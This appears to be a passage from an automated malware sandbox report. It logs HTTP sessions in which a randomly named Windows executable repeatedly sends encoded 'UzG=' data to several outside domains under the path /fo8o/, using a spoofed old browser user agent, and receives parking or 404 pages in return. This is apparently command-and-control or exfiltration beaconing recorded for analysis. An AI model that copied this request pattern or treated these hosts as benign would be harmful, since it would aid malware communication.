75 6d 7a 4c 67 61 41 33 54 2f 58 6f 6d 65 44 6d 76 4b 79 68 45 33 61 76 52 31 66 53 45 79 67 58 6e 59 6b 47 6d 6c 67 4e 56 51 65 68 4f 31 36 35 63 4f 37 32 6c 69 68 4e 46 4c 78 6b 59 43 6a 56 6b 52 78 4d 79 6c 4c 70 48 69 2f 7a 71 65 4a 48 49 31 64 75 30 31 42 36 61 46 56 45 43 2b 47 4b 39 57 4a 55 36 67 59 4a 55 50 65 63 43 6a 7a 4b 39 73 77 44 57 61 79 62 38 5a 6d 48 5a 65 4a 2f 34 4f 53 53 44 72 58 4f 71 52 44 79 73 57 66 4e 33 69 72 64 62 46 68 52 78 48 61 73 64 47 4a [TRUNCATED] Data Ascii: UzG=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMoQ84+HaiplMLXyt/hmJnRFi9H/fWCV0fJvsRDLx6lH1p0zlX6NMlq38BEIWXFlAlX0L24fshsKxVlJfX9AA+MIUhZ9So9ITzDTaXkl14qKvkEl4KLHs5uRgds5UM4u8iYB1dbumzLgaA3T/XomeDmvKyhE3avR1fSEygXnYkGmlgNVQehO165cO72lihNFLxkYCjVkRxMylLpHi/zqeJHI1du01B6aFVEC+GK9WJU6gYJUPecCjzK9swDWayb8ZmHZeJ/4OSSDrXOqRDysWfN3irdbFhRxHasdGJ8fHmgRUQ7q75bPSfk5DUYG9UBoGdi8/mF/xbb5iSBE5JY12dA9aYXe5DGaUCD9a4C2fei4rNKdB9+BuOOEs4LKirthC28h2UyW7au3cW4PlACw9lABunaNscL+QtWzR0nRbjK8h1wMNNZK1kvO/iZcESC7N+cDrmgluCEHjfQXc0V2cvBN6bVduPb1dXYDe5/WGT/pCef4uOWdjBYB3f2EIBwROeAD75Mkn4n9Gbm9RO9xHMSnAUWNtBfPdhdkU+HNFMIly/4KFW2Y3PE1IR2k1a68+R8/BBBBOIwVSCGCeSfnbUZzQBeUWLBT22wRNNq+pkmWyRUDpFvf2jyfm3jS5K5KbFyo+Q/N6MUOpbO4V9IW5yGU9dOvkF68jtOUwQnVuE34QDrlXP9Q7Q8RIajk+fsL6l23HbWMc5Rs6ZOhHPv/oN0K9yBpnczxPQwb/nUR7UgEKZD1DjVw/Itpwyrh2mukh9gARKuIkh6Dw0GhJs5mUjJZ5ykBfSPKYkHSaDVs8H6iFEa0XmrFHU8AZOyE6oSxQ5c7MfQUmgtQ950qfdhIgaLeofjVX6RZdPen2hXitfVv/8m4jR37t0NuhY5JWHwSC2h6mRHsY/Wrxf1b0F8wpfgYsZD2q/QAl3ByJjp3n6dvdP3bj+k0a9v6QyqIR5IJSPY60M8i [TRUNCATED]
Dec 24, 2024 08:25:44.950000048 CET	707	IN	HTTP/1.1 405 Not Allowed date: Tue, 24 Dec 2024 07:25:44 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49990	91.195.240.94	80	3440	C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 08:25:46.341620922 CET	515	OUT	GET /fo8o/?UzG=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&SFst=D27DuB HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.rssnewscast.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Dec 24, 2024 08:25:47.641958952 CET	1236	IN	HTTP/1.1 200 OK date: Tue, 24 Dec 2024 07:25:47 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_TqSfMrTQVCK61EY026Aqob4F0amjox1hnEZBFLD7NLJKdmvImdt91GLXbPD3dONQ13reikpv3kyPLnkLBV/x4g== last-modified: Tue, 24 Dec 2024 07:25:47 GMT x-cache-miss-from: parking-7df97dc48-8ltqc server: Parking/1.0 connection: close Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 54 71 53 66 4d 72 54 51 56 43 4b 36 31 45 59 30 32 36 41 71 6f 62 34 46 30 61 6d 6a 6f 78 31 68 6e 45 5a 42 46 4c 44 37 4e 4c 4a 4b 64 6d 76 49 6d 64 74 39 31 47 4c 58 62 50 44 33 64 4f 4e 51 31 33 72 65 69 6b 70 76 33 6b 79 50 4c 6e 6b 4c 42 56 2f 78 34 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e [TRUNCATED] Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_TqSfMrTQVCK61EY026Aqob4F0amjox1hnEZBFLD7NLJKdmvImdt91GLXbPD3dONQ13reikpv3kyPLnkLBV/x4g==><head><meta charset="utf-8"><title>rssnewscast.com - rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informatio
Dec 24, 2024 08:25:47.641988993 CET	1236	IN	Data Raw: 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 Data Ascii: n youre looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are searchiAECng for!"><link rel="icon" type="image/png" href="//img.s
Dec 24, 2024 08:25:47.642004967 CET	1236	IN	Data Raw: 65 2d 68 65 69 67 68 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 30 2e 32 35 65 6d 7d 73 75 70 7b 74 6f 70 3a 2d 30 Data Ascii: e-height:0;position:relative;vertical-align:baseline}sub{bottom:-0.25em}sup{top:-0.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,sele
Dec 24, 2024 08:25:47.642147064 CET	1236	IN	Data Raw: 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 7d 3a 3a 2d 77 65 62 6b 69 74 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 62 75 74 74 6f 6e 7b Data Ascii: ]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:no
Dec 24, 2024 08:25:47.642163992 CET	896	IN	Data Raw: 3a 39 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 38 32 30 70 78 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 7b 70 61 64 64 69 6e 67 3a 30 20 30 20 31 2e 36 65 6d 20 30 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c Data Ascii: :90%;min-height:820px}.two-tier-ads-list{padding:0 0 1.6em 0}.two-tier-ads-list__list-element{list-style:none;padding:10px 0 5px 0;display:inline-block}.two-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/templates/images/
Dec 24, 2024 08:25:47.642180920 CET	1236	IN	Data Raw: 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 66 6f 63 75 73 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 Data Ascii: ist-element-link:focus{text-decoration:none}.webarchive-block{text-align:center}.webarchive-block__header-link{color:#0a48ff;font-size:20px}.webarchive-block__list{padding:0}.webarchive-block__list-element{word-wrap:break-word;list-style:none}
Dec 24, 2024 08:25:47.642199993 CET	1236	IN	Data Raw: 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 35 70 78 3b 62 6f 72 64 65 72 3a 30 20 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 32 70 78 20 38 70 78 3b 63 6f 6c 6f 72 3a 23 36 33 38 32 39 36 7d 2e 63 6f Data Ascii: er;font-size:12px;margin-left:15px;border:0 none;padding:2px 8px;color:#638296}.container-disclaimer{text-align:center}.container-disclaimer__content{display:inline-block}.container-disclaimer__content-text,.container-disclaimer a{font-size:10
Dec 24, 2024 08:25:47.642216921 CET	556	IN	Data Raw: 6e 74 65 6e 74 2d 69 6e 74 65 72 61 63 74 69 76 65 2d 68 65 61 64 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 69 6e 74 65 72 61 63 74 69 76 65 2d 74 65 78 74 7b 63 6f 6c 6f 72 Data Ascii: ntent-interactive-header,.container-cookie-message__content-interactive-text{color:#fff}.container-cookie-message__content-interactive-header{font-size:small}.container-cookie-message__content-interactive-text{margin-top:10px;margin-right:0px;
Dec 24, 2024 08:25:47.642435074 CET	1236	IN	Data Raw: 31 30 35 43 0d 0a 74 2d 68 65 61 64 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 35 70 78 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 7b 74 65 78 74 2d 61 Data Ascii: 105Ct-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:inline-block;max-width:550px}.cookie-modal-window__content-text{line-height:1.5em}.cookie-modal
Dec 24, 2024 08:25:47.642451048 CET	1236	IN	Data Raw: 6e 74 2d 73 69 7a 65 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 63 6f Data Ascii: nt-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:initial}.switch input{opacity:0;width:0;he
Dec 24, 2024 08:25:47.761827946 CET	1236	IN	Data Raw: 3d 20 7b 22 75 69 4f 70 74 69 6d 69 7a 65 22 3a 66 61 6c 73 65 2c 22 73 69 6e 67 6c 65 44 6f 6d 61 69 6e 4e 61 6d 65 22 3a 22 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 22 2c 22 64 6f 6d 61 69 6e 4e 61 6d 65 22 3a 22 72 73 73 6e 65 77 73 63 61 Data Ascii: = {"uiOptimize":false,"singleDomainName":"rssnewscast.com","domainName":"rssnewscast.com","domainPrice":0,"domainCurrency":"","adultFlag":false,"pu":"//www.rssnewscast.com","dnsh":true,"dpsh":false,"toSell":false,"cdnHost":"img.sedoparking.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49991	66.29.149.46	80	3440	C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 08:26:02.012259007 CET	781	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 204 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 55 7a 47 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 49 64 72 2b 59 53 49 49 64 68 49 53 61 68 49 73 7a 47 4e 63 69 31 4e 6f 76 79 34 6b 6d 62 53 73 59 6e 36 30 39 74 77 3d Data Ascii: UzG=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXIdr+YSIIdhISahIszGNci1Novy4kmbSsYn609tw=
Dec 24, 2024 08:26:03.241569996 CET	637	IN	HTTP/1.1 404 Not Found Date: Tue, 24 Dec 2024 07:26:03 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49992	66.29.149.46	80	3440	C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 08:26:04.669610977 CET	801	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 224 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 55 7a 47 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 68 51 2f 68 77 54 33 72 7a 46 43 45 71 45 6a 36 6c 52 4e 63 71 31 55 39 69 56 32 62 32 58 2f 52 73 2b 46 6d 46 4e Data Ascii: UzG=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVhQ/hwT3rzFCEqEj6lRNcq1U9iV2b2X/Rs+FmFN
Dec 24, 2024 08:26:05.911892891 CET	637	IN	HTTP/1.1 404 Not Found Date: Tue, 24 Dec 2024 07:26:05 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49993	66.29.149.46	80	3440	C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 08:26:07.316011906 CET	1818	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1240 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 55 7a 47 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 63 57 44 32 67 46 78 31 5a 31 7a 56 4d 79 39 68 4d 2f 32 39 50 59 42 6b 57 65 67 36 34 30 57 38 32 68 53 35 62 52 2b 37 33 2f 70 31 59 78 46 53 30 52 52 4a 71 57 32 41 7a 76 70 6a 47 62 49 38 31 4c 70 36 56 6b 71 62 39 50 7a 33 70 72 75 61 75 50 52 51 6d 44 34 44 49 71 68 2b 41 4e 67 61 38 6b 31 58 38 6b 79 50 74 4d 6d 67 59 70 30 4f 63 45 34 33 4a 57 57 37 4e 71 4c 65 49 6f 76 41 4a 52 66 63 6e 2f 44 2b 4a 63 52 51 61 42 5a 72 68 6b 73 75 44 75 5a 71 6c 45 73 48 4a 2f 58 37 38 67 57 6f [TRUNCATED] Data Ascii: UzG=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNncWD2gFx1Z1zVMy9hM/29PYBkWeg640W82hS5bR+73/p1YxFS0RRJqW2AzvpjGbI81Lp6Vkqb9Pz3pruauPRQmD4DIqh+ANga8k1X8kyPtMmgYp0OcE43JWW7NqLeIovAJRfcn/D+JcRQaBZrhksuDuZqlEsHJ/X78gWoLuPOUIMSi8BLb47JHp5nQZNcZXj6xRy4dk7daE4QycCvUUzUe6EDlGixQLo2JyxdCCjB99BrvpqTvXwoZrEGGveh1YUvD1M9uwhS2Djxkp2e8N11pcLjj3V7fQpSR0PSbup4sS5SNgcqy1OyN6NQpjD2Gsu3STmTn34rqvP3gyE99T1zbRN89ecSSpiwgrnQGzxJxojkTHtDvbDPc2mGlo/980AbVDdw2V4nCfsT9slapAKaq7EEGSeL5i5bH26IQFj/h5ste+eT38btOkmrSX2Uhvlx7+D+TUFcb0rOFOgx6pWk/tKyNXB3rpiYyOR3CiXEqvkhsCKuR2XyVnr3LLe3yV8xHwOTAsZlk9Nr/Hv2Em+zLzYgGBbMENFa0u3f1ylUJeHH8+xGvGM590iI5Uth1I3mxhoJAWDEtppY9LEAiRV+61TFKzUpnM/NRdGOhW5gQEEIRQerBC2R6JTJSEhRMdJ2qTrSzwMCv6VK/n9JXBnu0IG5JtM4G4aYE6Gxt6X1aPY/iCWvNrPXZ4pqgS5iXxHEzdRdodsc9HffbWjYC+3vYu6i5JjkxnT4vfwdN4eDxFbB6sazM4ctju758/LnwlpcqPUKQL9J0uN1KUOJXUXxOtQEXmVLwJAtDjqkYSHfXcx//o/Hx0FG1qN10o4BtUTVzxSFsW [TRUNCATED]
